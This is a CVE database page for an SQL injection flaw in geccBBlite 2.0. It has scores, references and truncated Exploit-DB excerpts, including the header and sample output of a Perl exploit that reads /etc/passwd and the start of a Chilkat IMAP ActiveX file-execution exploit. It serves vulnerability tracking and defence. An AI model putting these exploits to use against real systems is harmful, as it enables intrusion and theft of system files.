CVE-2008-4517
published 2008-10-09CVE-2008-4517: SQL injection vulnerability in leggi.php in geccBBlite 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in leggi.php in geccBBlite 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geccbblite | geccbblite | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
geccBBlite 2.0 - 'id' SQL Injection
exploitdb·2008-10-05
CVE-2008-4517 geccBBlite 2.0 - 'id' SQL Injection
geccBBlite 2.0 - 'id' SQL Injection
---
#!/usr/bin/perl
################################
## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
## D.O.M Team
## piker,ka0x,an0de,xarnuz
## 2008 Security Researchers
################################
##
## geccBBlite Forums SQL Injection Exploit
##
## This exploit tries to read an
## arbitrary file.
##
################################
# piker@domlabs:~/advisories$ perl geccBB.pl http://localhost/geccBB /etc/passwd
#[+] Prefix: geccBB_
#[+] File HEX: 0x2f6574632f706173737764
#[+] Host: http://localhost/geccBB/
#[+] File content:
#daemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/#bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/
Exploit-DB
Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service
exploitdb·2008-09-27
CVE-2008-7022 Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service
Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service
---
##################Chilkat IMAP ActiveX File Execution&IE DoS ################
www.chilkasoft.com
####By: e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum
In the wild...
#####################################################################################
File: ChilkatMail_v7_9.dll
ProgID: ChilkatMail2.ChilkatMailMan2.1
CLSID: 126FB030-1E9E-4517-A254-430616582C50
Description:
Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE.
Tested on IE 6,Win xp sp2
#####################################################################################
targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat IMAP ActiveX\Chilk
No writeups or analysis indexed.
http://securityreason.com/securityalert/4382http://www.securityfocus.com/bid/31585https://exchange.xforce.ibmcloud.com/vulnerabilities/45682https://www.exploit-db.com/exploits/6677http://securityreason.com/securityalert/4382http://www.securityfocus.com/bid/31585https://exchange.xforce.ibmcloud.com/vulnerabilities/45682https://www.exploit-db.com/exploits/6677
2008-10-09
Published